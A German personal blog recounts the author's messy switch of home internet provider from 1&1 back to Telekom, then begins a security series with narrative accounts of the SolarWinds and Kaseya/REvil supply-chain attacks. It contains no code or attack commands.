Inzwischen näherte sich der Feierabend und ich sagte eine gemütliche Runde bei Freunden ab, bei denen wir mechanische Keyboards bestaunen und probetippen wollten (habe ich erwähnt, dass wir ziemliche Nerds sind?). Stattdessen schrieb ich erst eine Antwort mit Bitte um Klärung auf die 1&1-Kündigungsmail, wobei die Nachricht direkt als unzustellbar zurück kam. Der Support-Chat bekam dieselbe Nachricht, doch derartige Anliegen könne man leider nur telefonisch klären. Also back to Hotline, die Nummern kenne ich inzwischen sowieso halbwegs auswendig. Wenigstens verursachen diese Eskapaden mir keine Zusatzkosten, da auch mein Mobilfunkvertrag (noch ein Jahr) bei 1&1 liegt.

In der Hotline war man überrascht über das sofortige Kündigungsdatum, musste aber zum großen eigenen Bedauern feststellen, dass man im Grunde jetzt gar nichts mehr daran ändern könne und dass der Prozess jetzt automatisch durchlaufen werde. Die Sperrung der Leitung bis zum 21.06. könne man sich aber nicht erklären, es könne aber durchaus sein, dass bis zu diesem Zeitpunkt wenigstens die Internetverbindung weiterhin zur Verfügung stehe. Das wäre aus meiner Sicht auch wünschenswert und ggf. im Rahmen der Weiterversorgungspflicht bei einem Anbieterwechsel auch angeraten, denn sonst könnte es für die 1&1 zu unverhältnismäßigen Mehrkosten kommen, wenn sie mir die Ausfalltage bezahlen müssten. Mir wäre es vom Finanziellen her komplett egal, auf die knapp 100€ könnte ich durchaus verzichten, aber es wäre mit erheblichem Mehraufwand verbunden. Ganz davon ab, dass ich trotzdem kein Internet haben würde.

Der Fall wurde direkt ins Backoffice weitergegeben und um Klärung und schnelle Rückmeldung bei mir gebeten. Gespannt wartete ich, ob diese Rückmeldung noch erfolgen würde, bevor ich durch das Kappen der Verbindung für die kommenden 10-11 Tage auf normalem Wege nicht mehr erreichbar sein würde.
Wer sich jetzt fragt, wieso ich nicht erreichbar sein sollte, wenn das Festnetz abgeschaltet ist, es gebe ja immerhin noch Mobilfunk und ich sei ja offenbar auf Mobilfunkkunde bei 1&1: Alles schön und gut, aber in meiner Souterrain- oder Kellerwohnung habe ich in der Tat meistens keinen oder unglaublich schlechten Empfang - ich bin nur durch WLAN-Telefonie direkt erreichbar, alles andere erfordert, dass ich vor die Haustür gehe. Leider ist die Empfangssituation auch im Büro eher mau, die Datenverbindung schafft das Smartphone nur nahe der Fenster, Telefonieverbindungen sind derart wackelig, dass ich auf den Balkon gehen muss. Keine guten Voraussetzungen, um mit dem 1&1-Support über meine nicht mehr geschaltete Leitung zu sprechen.

Zwischenspiel: Die seltsame Welt der Psyche

Ich finde es erstaunlich, wie unruhig ich werde, wenn mir angedroht wird, eine Weile ohne Internet auskommen zu müssen. Ansich ist es kein allzu großes Ding, denn meiner Arbeit kann ich auch im Office nachgehen, wo ich ausreichend mit Internet versorgt werde. Meine Geräte könnte ich im Zweifel bei den Nachbarn ins Gast-WLAN hängen, denen ich wenige Wochen zuvor bis zur Schaltung ihres Internets mein WLAN zur Verfügung gestellt hatte, ich müsste vermutlich nur fragen. Und elektiv (also aus eigener Entscheidung) genieße ich zuweilen auch mal Stunden, Tage oder gar Wochen ohne oder mit nur ganz wenig Internet. Digital Detox quasi.

Und dennoch: Der Gedanke in den kommenden Tagen potenziell nicht frei im Netz surfen, an meiner Infrastruktur basteln oder die eine oder andere Doku schauen zu können verunsichert mich. Wie ein Stück Freiheit, das mir böswillig genommen wurde. Nicht, dass ich noch hunderte Dokus auf dem NAS liegen hätte, die nur darauf warten, geschaut zu werden. Nicht, dass ich nicht sowieso wieder öfter im Grunewald wandern und Pilze suchen gehen wollte. Nicht, dass ich sowieso urlaubsreif bin und eine kleine digitale Auszeit durchaus brauchen könnte. Aber darum geht es schließlich nicht, all das könnte ich ja, wenn ich wollte, und überhaupt. Kurz: Meckern auf hohem Niveau mit ausreichend Ausweichmöglichkeiten und Fallback-Lösungen. Trotzdem alles doof.

Der Tag danach oder: Bin ich da noch drin, oder was?

Als ich am nächsten Morgen aufwachte, ging mein erster Blick zum Smartphone. Genauer: Zum Mail-Postfach, das mir zwar nicht die erwartete Antwort von 1&1, aber immerhin erst vor kurzem eingegangene E-Mails anzeigte. Die WLAN-Verbindung war aktiv, kein Anzeichen von Internetlosigkeit. Hatte meine dringliche Anfrage tatsächlich etwas bewirkt? An dieser Stelle muss ich gestehen: Ich weiß es nicht. Bis heute habe ich keine Rückmeldung erhalten, ob ein Techniker sich todesmutig in die anlaufende Maschinerie des Kündigungs-Automatismus stürzte und unter Lebensgefahr eine Brechstange in das komplizierte Räderwerk trieb, um es noch für einige Tage aufzuhalten. Vielleicht habe ich den deutlichen Wortlaut der Kündigungsbestätigung und den sofortigen Kündigungszeitpunkt auch einfach falsch verstanden und eine Weiterversorgung wäre in jedem Fall erfolgt. Ich finde jedenfalls Gefallen an der ersten Vorstellung, ein wenig Drama passt ganz gut zu dem ganzen Clusterfuck.

Ich für meinen Teil brauchte für den Stress der letzten Tage jedenfalls einen Ausgleich. In den morgendlichen Mails fand sich unter anderem eine Nachricht von Keychron, dass das Keyboard, in das ich mich schon vor langem und am Vorabend erneut schockverliebt hatte, spontan wieder lieferbar war. Drei Klicks später und um 240€ ärmer machte sich das wohlige Gefühl des entspannenden Impulskaufes breit und ich machte mich auf zur Arbeit.

Böses Erwachen an Tag 2

Ich bin Langschläfer, wenn mein Wecker mich behutsam aus dem Schlaf reißt ist es selten vor 8 Uhr. Vor 9 Uhr bin ich kaum ansprechbar oder gar fähig, sinnvolle Entscheidungen zu treffen, außer ich helfe gezielt mit Koffein oder anderen Wachmachern nach. Umso seltener kommt es vor, dass ich mitten in der Nacht, so gegen 3 oder 4 Uhr früh, plötzlich hellwach bin.

Moderne Smartphones sind tatsächlich ein klein wenig smart, denn wenn sie im WLAN keine Internetverbindung feststellen, routen sie den Datenverkehr einfach direkt über die SIM-Karte ins mobile Internet. So erreichten mich zwischen 3 und 4 Uhr nachts auch die dringlichen Meldungen der externen Überwachungsmechanismen, die die permanenten VPN-Verbindungen in mein Heimnetz überwachen und auf verschiedenen Kanälen eine mehr als wenige Minuten anhaltende Verbindungsstörung festgestellt hatten. Sprich: Das Handy blinkte wie ein Weihnachtsbaum und die priorisierten Meldungen wurden an der nächtlichen Stummschaltung vorbei geroutet. Normale Weckertöne sind mir lieber.

1&1 hatte die Ankündigung, alle Dienste mit Vertragsende einzustellen, umgesetzt. Ändern kann ich daran nichts, daher stellte ich die Alarme stumm, vergewisserte mich, dass alles andere noch funktionierte wie gewohnt und legte mich wieder hin. Alles Weitere würde ich später klären müssen.

Den Tag verbrachte ich im Büro, erledigte die Arbeiten, für die ich den Kopf gerade noch frei bekommen konnte, und beriet mich mit einigen Kollegen und Bekannten, die noch etwas tiefer in der Thematik stecken als ich. Als Mitarbeiter eines Unternehmens, das unter anderem Themen wie BCM, ISMS, IT-Security und Incident Response abdeckt, habe ich Zugang zu einem breiten Wissensschatz, der zwar in der Regel im Firmenumfeld zum Tragen kommt, aber durchaus auch auf Privatpersonen anwendbar ist.

Der erste ernsthafte Anruf ging mal wieder zu 1&1. Dort bestätigte man mir die Trennung der Verbindung, den weiterhin auf dem 21.06.2024 stehenden Sperrtermin für den Anschluss und nahm meine freundliche aber bestimmte Aufforderung, diese Sperre zu entfernen und der Telekom den Zugriff zu ermöglichen relativ gelassen hin. Es wurde ein Rückruf oder wenigstens eine E-Mail im Laufe des Tages versprochen, in der man den aktuellen Bearbeitungsstand mitteilen werde. Mehr könne man gerade nicht tun, gebe das Anliegen aber wie üblich mit hoher Priorität an die entsprechende Stelle.

Natürlich erhielt ich an diesem Tag weder einen Anruf, noch eine E-Mail. Nicht, dass ich an dieser Stelle ernsthaft damit gerechnet hätte. Und so erhielt die Bundesnetzagentur am frühen Abend eine ausführliche Darstellung der Lage mit der Bitte, die zur Verfügung stehenden Mittel zu verwenden, mir zu helfen. Mir war bewusst, dass auch die Bundesnetzagentur vermutlich erst dann reagieren würde, wenn bereits ein Großteil der Wartezeit auf den neuen Anschluss vergangen sein würde, doch das Thema einfach auf sich beruhen zu lassen war für mich keine Option mehr. Da ich durch die unerwünscht frühe Abschaltung der Leitung und die Sperre des Anschlusses für Mitbewerber bis anderthalb Wochen nach Vertragsende (hier liegt das eigentliche Problem) deutliche Mehraufwände und Kosten haben würde, nahm ich die Geschichte nun endgültig persönlich.

Weitere mögliche Schritte

Am Samstag, einen Tag später, erhielt ich im Übrigen dann doch noch eine Antwort seitens 1&1. Man bestätigte mir, dass der Port weiterhin bis zum 21.06. blockiert bliebe. Well, so be it. Die Bundesnetzagentur meldete sich am folgenden Montag zurück: Das Ganze sei ein zivilrechtliches Problem, das sie nicht klären können und ich möge mich an den Verbraucherschutz oder einen Anwalt wenden. Auch der weiterhin gesperrte Port sei nicht in ihrem Aufgabenbereich, das sei eine reine Absprachesache zwischen altem und neuem Anbieter. Well, danke für nichts an dieser Stelle, ich frage mich derweil, was passieren muss, damit die Behörde sich einschalten darf. Aber gut.

Das Wochenende verbrachte ich größtenteils offline. Ich informierte am Freitag meine Kollegen, dass ich ggf. telefonisch und zumindest auf den Firmengeräten überhaupt nicht erreichbar sein würde und das Wochenende nicht direkt zur Verfügung stehe. Glücklicherweise hatte ich in den letzten Jahren für den ebenfalls bei 1&1 laufenden Mobilfunkvertrag etliche dutzend Gigabyte an Datenvolumen angesammelt, so dass ich wenigstens keine übermäßige Sorge haben musste, komplett offline zu sein. Dass ich in der Souterrain-Wohnung kaum Empfang habe - geschenkt, ich nutzte die zwei Tage, um zu wandern, Freunde zu besuchen und in Ruhe zu Hause offline diesen Artikel weiter zu schreiben. Ein lieber Nachbar, den ich die ersten internetlosen Tage in seiner neuen Wohnung mit meinem Gast-WLAN versorgt hatte, revanchierte sich und ließ mich sein Netz mit nutzen (auch wenn die Verbindung zwar auf dem Handy, aber nicht auf dem PC stabil lief - bedingt durch das Fritzbox-Captive-Portal und meine Netzstruktur, die gerne Default-Routen setzt). So konnten wenigstens einzelne Geräte eingeschränkt kommunizieren und ich musste das Smartphone nicht permanent als Hotspot ans Fenster legen.

Ich werde wohl noch mit dem Verbraucherschutz meine Optionen für eine Kompensation der Ausfälle und Mehraufwände besprechen, immerhin fallen für den gescheiterten Vertrag keine zusätzlichen Kosten an. Die kommenden Tage arbeite ich jedenfalls zwangsweise vom Büro aus, nicht aus dem HomeOffice. Und dann gibt es ja auch noch die Rubrik “Vorsicht Kunde!” des vielgelesenen IT-Magazins heise, für die sich die beschriebenen Ereignisse geradezu anbieten. Vielleicht haben die ja Interesse an dem Fall.

Einer meiner besten Freunde formulierte es letztens ungefähr so: “Ich verstehe nicht, wieso manche Anbieter immer noch glauben, dass es eine gute Idee ist, sich mit ihren Power-User-Kunden anzulegen und sie zu vergraulen.” Ich stimme ihm zu. Im allerbesten Fall verlieren sie nur einen Kunden, der sie nicht mehr weiterempfiehlt. Im schlimmsten Fall verlieren sie zusätzlich Geld, Reputation und weitere Kunden. Power-User mögen zwar nur den Bruchteil eines Prozents der regulären Privatkunden ausmachen, aber häufig sind es genau diese Personen, die reichweitenstarke Blogs betreiben, in Unternehmen IT-Entscheidungen treffen oder einfach nur ihre Rechte und Möglichkeiten gut genug kennen, um sich effektiv wehren zu können. Und diese Nutzer sind es damit, die die öffentliche Wahrnehmung eines Dienstleisters stark beeinflussen können. Ob man sich diese potenziellen Fürsprecher unbedingt zum Feind machen möchte, sollte man sich als Unternehmen genau überlegen.

Die Moral von der Geschicht’: 1&1 vertraue (ich) nicht!

Ich kann - ohne das böswillig zu meinen - 1&1 als Internetanbieter derzeit nicht mehr guten Gewissens empfehlen. Das vereinzelt erschreckend falsche oder unvollständige Wissen um die eigenen Dienste und deren Einschränkungen sind ein absolutes No-go, das sowohl Neu- als auch Bestandskunden keine sinnvolle Einordnung von Leistungen und deren Auffälligkeiten erlaubt.

Positiv hervorzuheben ist, dass sie wenigstens einsehen, wenn die eigenen Mitarbeiter Mist erzählt haben und es daher unter falschen Annahmen zu einem Vertragsabschluss kam. Das Sonderkündigungsrecht wurde ohne Verhandlungen eingeräumt. Doch trotz des Wissens, dass ein Wechsel zurück zum ursprünglichen Anbieter stattfinden sollte und trotz der Bitte, wenigstens genügend Zeit zu gewähren, um die Umstellung möglichst unterbrechungsarm vorzunehmen, wurde die Kündigung zu “sofort” ausgesprochen - als nun-nicht-mehr-Kunde wird man mit widersprüchlichen Informationen und dem Verweis, nun sei es zu spät, noch etwas zu ändern, alleine stehen gelassen.

Negativ bewerte ich auch das Festhalten an den täglichen Zwangstrennungen der Internetverbindung. Auch hier fallen besonders negativ die verschiedenen Versuche auf, dieses Verhalten als von Dritten erzwungen darzustellen. Nach meinem aktuellen Kenntnisstand schreibt weder ein Gesetz (nein, auch das TKG nicht) diese Trennung nach 24 Stunden vor, noch die Telekom als Leitungseigner, die nur an 1&1 vermietet (dies würde vermutlich auch zu wütenden - und vor allem erfolgreichen - Klagen wegen unlauteren Wettbewerbs, Marktverzerrung oder Ähnlichem seitens der Konkurrenz führen). Die einzigen Gründe für eine derartige Trennung stammen aus der grauen Vorzeit des Internets. Wahlweise musste man hier aus Abrechnungsgründen trennen, um hohe Kosten durch versehentlich aktiv gelassene Verbindungen zu vermeiden, um zu verhindern, dass Kunden einfach ihre IPv4-Adresse behalten und Server dahinter bereitstellen anstatt diese teuer zu mieten, oder (ein neuzeitlicheres Argument) um IPv4-Adressen neu zu verteilen, da diese verbraucht seien. Ganz, ganz selten bekommt man auch halbwegs intelligent scheinende Argumente wie die Gewährleistung des Datenschutzes, da durch die Trennung und Neuvergabe von IP-Adressen ein Tracking verhindert werde - wer sich allerdings ein wenig mit der Materie auskennt weiß, dass Tracking anhand von IP-Adressen so gut wie gar nicht stattfindet, denn hinter den meisten öffentlichen IP-Adressen stecken meist mehrere Kundengeräte und teils auch mehrere verschiedene Personen. Eine Zuordnung von Informationen anhand einer einzelnen IP-Adresse wäre so dennoch sehr mühsam, es gibt wirksamere (und günstigere) Methoden.

Alles in allem wird mit vielen Schein- und noch mehr falschen Informationen versucht, die Unart der Zwangstrennung zu verteidigen. Dass es weder einen gesetzlichen Zwang dafür gibt, noch technische Notwendigkeiten, zeigen immer mehr Internetanbieter. Nicht zuletzt die Telekom zeigt, dass es anders geht. Dass ein Anbieter durch derartige Trennungen möglicherweise sogar Leben gefährdet, indem durch die Trennung bei den modernen All-IP-Anschlüssen nicht nur das Internet, sondern damit auch gleich die Festnetztelefonie getrennt werden und Notrufe unterbrochen werden oder für die Zeit des Reconnects nicht möglich sind, ist ein anderer Faktor, der mich kopfschüttelnd zurück lässt.

Positiv hervorheben möchte ich an dieser Stelle die schnelle und unkomplizierte Bestellung und hoffentlich baldige Bereitstellung eines neuen Anschlusses durch die Telekom. Während des Bestellprozesses fühlte ich mich gut und umfangreich beraten und alle meine Fragen konnten beantwortet werden - auch die, für die ich die Antwort schon kannte und die ich zur Sicherheit einfach noch einmal stellte. Vertrauen ist gut, Kontrolle ist besser, wie man so schön sagt.

Ich lerne jedenfalls für mich aus diesem Exkurs zu anderen Anbietern: Mehr Zeit nehmen, um sichere Informationen einzuholen. Mehr Quellen konsultieren. Weniger spontane Entscheidungen treffen. Bessere Alternativen finden und den Faktor Geld nicht so hoch bewerten. Und Mitte 2025 dann auch den Mobilfunkvertrag zur Telekom umziehen, dann hat auch das begrenzte Datenvolumen ein Ende.

Aber eigentlich wäre es auch schade gewesen, diesen Artikel nicht schreiben zu können, oder…? ;)

Epilog

Am 22. des sechsten Monats im Jahre des Herren 2024 begab es sich also, dass die Telekom die Arme gen Himmel hob und sprach: “Dies ist Deine Leitung und nun geh und konfiguriere Deine Zugangsdaten und tue Gutes!” Und ich tat wie geheißen, die Firewall summte verzückt, das Modem blinkte und alle Geräte nah und fern gingen online und zogen sich Updates. Doch ich sprach: “Dies soll mir eine Lehre sein!” und tat fürderhin nur noch Gutes.

Sicherheit

IT-Sicherheit ist für mich nicht nur auf beruflicher Ebene ein spannendes Themenfeld, mit dem ich täglich zu tun habe. Auch privat beschäftigt es mich, und es ist unklar, ob das Berufliche von meinen privaten Erkenntnissen mehr profitiert oder es sich anders herum verhält.

Und da geteiltes Wissen gutes Wissen ist, gebe ich hier einige Einblicke. Und auch wenn ich eigentlich nicht dazu neige, konkrete Empfehlungen für Produkte zu geben, komme ich an einigen Stellen nicht darum herum.

Unterabschnitte von Sicherheit

Beinahe-Katastrophen

Nostradamus, Maja, Pandemie, IT!

Alles ganz, ganz schlimm. Was hätte uns nicht schon alles schon passiert sein sollen. Falsch interpretierte Kalender und Vorhersagen, die aus dem Kontext oder ihrer Zeit gerissen werden. Dazu Kriege, Krankheitswellen und orangene Präsidenten mit dem Finger auf dem Atom-Knopf. Dazu noch Y2k, Y2k10, YETI, Y2k22 sowie Y2k38. Vorhergesagte Katastrophen haben einen gewissen Reiz, einen Nervenkitzel. Eigentlich glaubt man ja nicht daran, aber was, wenn doch? Was, wenn morgen doch die Welt untergeht?

Wie nah wir jedoch von Zeit zu Zeit tatsächlich am Abgrund standen und immer wieder stehen, bekommen viele Menschen gar nicht mit. In den letzten Jahren ist das Thema “Blackout” immer wieder auf dem Tisch und wir wissen eins: Wenn es dazu kommt, sieht es für uns ziemlich düster aus. Literally. Zusätzlich sind weltweite Lieferketten, die von funktionierenden IT- und Kommunikationssystemen abhängen, fragil wie nie; eine Störung wird mit steigender Komplexität und immer größeren Abhängigkeitsketten immer wahrscheinlicher und weitreichender.

In dieser Rubrik nehme ich Dich mit auf die Reise durch die wunderbare Welt der Beinahe-Katastrophen, die für die meisten unter dem Radar verlaufen sind oder deren mögliche Auswirkungen seinerzeit bewusst nicht an die große Glocke gehängt wurden. Ich konzentriere mich hierbei auf Ereignisse, die sich um IT-Sicherheit drehen, denn die meisten anderen großen Weltuntergangsszenarien kennst Du eh schon von der Leinwand oder aus der BLÖD… äh, BILD.

Eigentlich wollte ich die jeweiligen Ereignisse locker humoristisch aufarbeiten, aber meistens bleibt mir bei IT-Sicherheits-Themen auf dem Weg das Lachen im Halse stecken… Ich hoffe, es ist trotzdem interessant! Und wenn Du trotzdem etwas zum Schmunzeln findest: Behalte es im Herzen!

Unterabschnitte von Beinahe-Katastrophen

SolarWinds

Weltweite Ausfälle durch digitale Sonnenwinde

I’m sorry, I could not resist. Das Wortspiel drängte sich in diesem Kontext geradezu auf.

2020 begann mit Shitrix und endete mit einem Security-Desaster bei dem Softwarehersteller Solarwinds, das letztendlich gut 18.000 Firmen betraf, die deren Software einsetzten. Der Begriff “Supply Chain Attack” war schon vorher bekannt, durch diesen Vorfall jedoch war er plötzlich in aller Munde. Was war passiert?

Digitale Lieferketten

Die als “Sunburst” bekannt gewordene Hintertür in der Software “Orion”, die vom Hersteller Solarwinds weltweit vertrieben wird und in vielen Unternehmen zum Einsatz kam, wurde zuerst von der IT Security-Firma FireEye entdeckt, als Angreifer auf diesem Weg das Unternehmen angriffen. Die Angreifer hatten eigenentwickelte Tools für fortschrittliche Penetrationstests entwendet, die auch für reale Angriffe verwendet werden können. FireEye veröffentlichte zeitnah Informationen, wie man sich gegen diese Tools wappnen und diese erkennen konnte und untersuchte den Vorfall intern.

Doch der Angriff auf FireEye war nur die Spitze des Eisbergs. Bereits wenige Tage nach bekanntwerden kristallisierte sich heraus, dass das Problem größer war als die Sicherheitsgemeinschaft bis dato angenommen hatte. FireEye fand heraus, dass der Angriff über die Orion-Software stattgefunden hatte. Orion kam bei unterschiedlichsten Firmen und Organisationen zum Einsatz, unter anderem auch beim US-Handelsministerium, das US-Außenministerium und das Pentagon. Auch viele Deutsche Firmen waren betroffen. Doch wie war das möglich?

Orion ist eine Software, die zur IT-Verwaltung und -Überwachung eingesetzt wird. Wo sie im Einsatz ist, hat sie weitreichende Berechtigungen auf den überwachten Systemen. Wie die meisten Programme erhielt auch Orion regelmäßig Updates seitens des Herstellers, und genau hier setzten die Angreifer an. Sie lieferten manipulierte Updates an die Solarwinds-Kunden aus, indem sie einen Build-Server des Unternehmens übernahmen.

Triviale Kennwörter für Kerninfrastruktur

Bereits Mitte November 2019 hatte der Sicherheitsforscher Vinoth Kumar dem Unternehmen mitgeteilt, dass er in einer öffentlich zugänglichen Github-Repository Zugangsdaten zu einem FTP-System bei Solarwinds gefunden hatte, das für die Updateverteilung für Solarwinds-Produkte zuständig war. Er hatte als Nachweis, dass damit ein Zugriff möglich war, sogar eine harmlose Datei dort hochgeladen. Besonders brisant: Das Passwort war denkbar trivial: “solarwinds123”. Das Unternehmen meldete sich einige Tage später und bestätigte, sich um die Zugangsdaten “gekümmert” zu haben. Was genau das beinhaltete ließen sie offen. Die geleakten Zugangsdaten waren zu diesem Zeitpunkt jedenfalls bereits mehrere Wochen im Internet abrufbar gewesen. Auch die Quelle sei nun nicht mehr öffentlich verfügbar, was darauf schließen lässt, dass das Github-Projekt möglicherweise von Solarwinds selbst betrieben wurde - Kumar selbst lieferte diesbezüglich keine Details.

Es ist bis heute unklar, ob dieser öffentliche Zugang zu Update-Komponenten dazu führte, dass wenige Monate später Angreifer Manipulationen an den Build-Systemen der Firma vornahmen. Auszuschließen ist es nicht. Denkbar ist aber auch, dass auch andere Dienste, die öffentlich erreichbar waren, ähnlich schwache Passwörter oder andere Sicherheitslücken aufwiesen, die den Angreifern Zugang gewährten. Offensichtlich hatten die Angreifer jedenfalls sowohl Zugriff auf das Build-System selbst als auch auf den verwendeten Signaturschlüssel, die den manipulierten Updates einen offiziellen Anstrich gaben.

Wie sich herausstellte, hatten die Angreifer bereits seit Frühjahr 2020, als zeitgleich die Shitrix-Sicherheitslücke die IT-Fachleute weltweit in Atem hielt, damit begonnen, mit der Sunburst-Hintertür versehene Updates auszuliefern. Ob der Fokus auf die Citrix-Thematik damals eine schnellere Entdeckung verhinderte ist unklar, er könnte aber durchaus ein Faktor gewesen sein.

Mangelhafte Absicherung und Täuschung

Solarwinds verkaufte seinen Kunden die eigene Software als sicher und unbedenklich - wie sich im Nachgang jedoch herausstellte, war dem Unternehmen sehr wohl bewusst, dass es um die eigene Sicherheits-Infrastruktur und die Sicherheit der Produkte selbst nicht gut bestellt war. Bereits 2018 wurde in internen Berichten davon gesprochen, dass der Fernzugriff nicht sonderlich gut abgesichert sei. In weiteren Präsentationen bis 2019 wurde sogar explizit erwähnt, dass der aktuelle Stand der Sicherheit das Unternehmen sehr verwundbar hinterlasse und auch der Zugang zu kritischen Daten nicht angemessen abgesichert sei. Das Unternehmen wusste also schon länger, dass die eigene Infrastruktur einem Angreifer kaum Hürden in den Weg stellte. Auch mehrere Mitarbeiter des Unternehmens erklärten, sie seien nicht überzeugt davon, dass das Unternehmen seine Vermögenswerte angemessen vor digitalen Angriffen schütze.

Dass der Angriff auf die zahlreichen Kundensysteme schließlich beendet werden konnte lag hauptsächlich daran, dass Microsoft die von den Angreifern verwendete Domain zur Koordinierung der Angriffe, die auf einen sogenannten Command&Control-Server (C&C) zeigte, übernahm und damit unschädlich machte. Auch wenn Microsoft dies nicht offiziell bestätigte, ließ ein Verantwortlicher es zwischen den Zeilen durchblicken, man müsse eben tun, was getan werden müsse.

Lessons learned?

Das Thema Solarwinds beschäftigte sowohl die betroffenen Unternehmen als auch Sicherheitsexperten noch eine ganze Zeit. Doch hatte Solarwinds aus der Katastrophe gelernt?

Bereits Mitte 2021 stand Solarwinds erneut im Mittelpunkt. Die hauseigene Software Serv-U, die zur Übertragung von Daten verwendet wird, hatte eine kritische Zero-Day-Schwachstelle (0-Day), die das Ausführen von beliebigem Code auf dem System erlaubte, auf dem ser Service lief. Das Unternehmen lieferte schnell ein Patch, nachdem erste Angriffe auf die verwundbaren Dienste von Microsofts Sicherheitsforschern beobachtet und gemeldet wurden. Glücklicherweise war die Schwachstelle nur unter bestimmten Voraussetzungen ausnutzbar, doch der erneute Vorfall hinterlässt ein sehr mulmiges Gefühl.

Supply Chain-Angriffe sind deswegen so gefährlich, weil Firmen der Software vertrauen, die sie einsetzen. Dass sie das tun, ist ganz natürlich und auch eigentlich kein Problem, doch der Fall Solarwinds zeigt, dass es auch eine Kehrseite gibt. Ein zulieferndes Unternehmen kann noch so vertrauenswürdig sein, eine einzige Sicherheitslücke bei einem zentralen Unternehmen reicht aus, um riesige Auswirkungen zu haben. Manche Schwachstellen wie triviale Kennwörter oder schlecht abgesicherte zentrale Systeme lassen mich kopfschüttelnd zurück, aber moderne Angreifer sind auf so etwas nicht zwingend angewiesen. Und irgendwo schlummert immer eine Sicherheitslücke, die bisher alle übersehen haben. Kriminelle Gruppen werden jedenfalls aus diesem und ähnlichen Vorfällen gelernt haben uns sich auch in Zukunft vermehrt auf Anbieter weit verbreiteter Softwarelösungen einschießen. Versprochen.

Kaseya

Supply-Chain-Ransomware - bitte was?!

Genau zwischen Shitrix und dem Solarwinds-Desaster dachte sich eine weitere Gruppierung, dass Dienstleister, deren Software von vielen Unternehmen zur Verwaltung ihrer Systeme eingesetzt wird, ein lohnendes Ziel sein könnten. Bis zu 1500 Unternehmen waren weltweit betroffen, offiziell gab es darunter auch einen größeren deutschen IT-Dienstleister, dessen Kunden durch die Angriffe betroffen waren. Dunkelziffer: Unklar.

Was den Kaseya-Vorfall von den anderen Fällen abhob war, dass die Angreifer es nicht beim Auskundschaften der Unternehmen und dem Abziehen von Daten beließen. Nach getaner Arbeit aktivierten sie nämlich noch eine Ransomware, die die Kundensysteme verschlüsselte - Erpresserschreiben inklusive. So etwas läuft unter dem Begriff “Double Extortion”, wobei zusätzlich zur Motivation, die verschlüsselten Daten ggf. wieder entschlüsselt zu bekommen auch noch die Veröffentlichung der gestohlenen Dateien im Raum steht, die nur durch eine großzügige Spende abgewendet werden soll. Derartige Praktiken sind bekannt - im Rahmen einer Supply Chain-Attacke jedoch in diesem Umfang neu.

Hintergründe

Ab dem 2. Juli 2021 häuften sich Berichte von Unternehmen, die Opfer einer Ransomware-Attacke wurden. Der Verdacht, dass diese Fälle zusammenhängen, erhärtete sich schnell, da zum einen dieselbe Ransomware verwendet wurde und sich zum anderen nach kurzer Zeit herauskristallisierte, dass die betroffenen Unternehmen eine Gemeinsamkeit hatten: Sie alle setzten die Software “Virtual System Administrator” (VSA) des Herstellers Kaseya ein. Mittels dieser Software lassen sich virtuelle und physische Systeme verwalten und überwachen. Kurioserweise deckt die Software laut Herstellerangaben (Stand 04/2024) auch “Ransomware Detection” ab - ein Plot Twist allererster Güte, denn im Rahmen des Angriffes wurde sie dafür verwendet, die Ransomware der Angreifer auf den Systemen zu aktivieren.

Bereits am 4. Juli bestätigte das niederländische DIVD CSIRT (dem Computer Security Incident Response Team des Computer Security Incident Response Team) in einem Blogpost, dass sich Kaseya mit ihnen in Verbindung gesetzt hatte, um die gefunden Schwachstellen im Rahmen einer CVE-Meldung (Common Vulnerabilities and Exposures, eine öffentliche Datenbank mit Informationen zu bekannten Sicherheitslücken) zu veröffentlichen. Details zu den einzelnen Sicherheitslücken wurden aber auch hier nicht genannt, einzig ein Verweis auf eine gemeldete Schwachstelle im Bezug auf Anmeldedaten wurde genannt.

Am selben Tag ließen auch die Angreifer von sich hören. Die Gruppe REvil veröffentlichte auf ihrer Leak-Webseite einen Beitrag, in dem sie bestätigten, hinter diesem Angriff zu stecken. REvil betreibt eine Art Franchise-System für Ransomware; die Truppe selber stellt Infrastruktur zur Koordinierung von Angriffen auf bereits von ihnen infiltrierte Infrastruktur bereit, inklusive einem Helpdesk für Opfer, die Hilfe beim Bezahlen der geforderten Summe in BitCoin oder dem daraufhin bereitgestellten Entschlüsselungstool haben. Kriminelle kaufen sich bei REvil Nutzungsrechte für eine gewisse Zeit und Zugänge zu den unter Kontrolle stehenden Systemen und können dort dann Daten ausleiten und nachfolgend die Ransomware, die ebenfalls von REvil programmiert und bereitgestellt wird, ausführen. REvil erhält am Ende einen Anteil der gezahlten Summe.

Am 5. Juli bestätigte Kaseya öffentlich, dass ihre Software verschiedene Zero Day-Schwachstellen (0-day) aufwies, die aktiv ausgenutzt wurden, um verwundbare VSA-Server anzugreifen. Unter anderem war es den Angreifern mithilfe dieser Schwachstellen möglich, die Authentisierung der Systeme auszuhebeln, zudem konnten sie beliebige Dateien auf die Server hochladen und eigenen Code ausführen. Details über die Schwachstellen machten sie zu diesem Zeitpunkt jedoch nicht öffentlich. Die genauen Details zu den drei Sicherheitslücken arbeiteten schließlich die Sicherheitsforscher der Unternehmen Huntress Labs und TrueSec im Detail heraus. Anhand dieser Untersuchungen stellte Huntress Labs die These auf, die Angreifer seien primär durch die Authentication Bypass-Schwachstelle in der Lage gewesen, die Kaseya-Systeme zu übernehmen.

Das DIVD CSIRT veröffentlichte drei Tage nach dieser ersten öffentlichen Stellungnahme einen weiteren Beitrag, in dem weitere Details der Schwachstellen genannt wurden. Insgesamt wurden sieben Schwachstellen genannt, von denen vier bereits in den aktuellen Versionen der VSA-Software gepatcht waren, die auf den meisten Kundensystemen im Einsatz gewesen sein dürfte. Die drei übrigen sollten im nächsten Release am 11.07.2021 behoben werden. Kaseya deaktivierte während der andauernden Untersuchungen die eigenen software-as-a-service (SaaS) Systeme, auch wenn sie nicht davon ausgingen, dass die Angreifer Kontrolle über diese Systeme hatten. Dies stellte eine weitere Einschränkung für Kunden dar, die mit diesen Systemen arbeiteten.

Währenddessen hatte REvil ein Angebot auf den Tisch gelegt, der für derartige Gruppen eher untypisch ist: Man bot an, für umgerechnet 70 Millionen Dollar in Bitcoin ein universelles Entschlüsselungsprogramm anzubieten, mit dem Kaseya (oder wer auch immer es kaufte) die Daten aller Opfer entschlüsseln könne. Die Täter sprechen in diesem Kontext von über einer Million betroffener Systeme - eine Zahl, die bis dato beispiellos im Rahmen einer solchen Kampagne war.

Abgesang

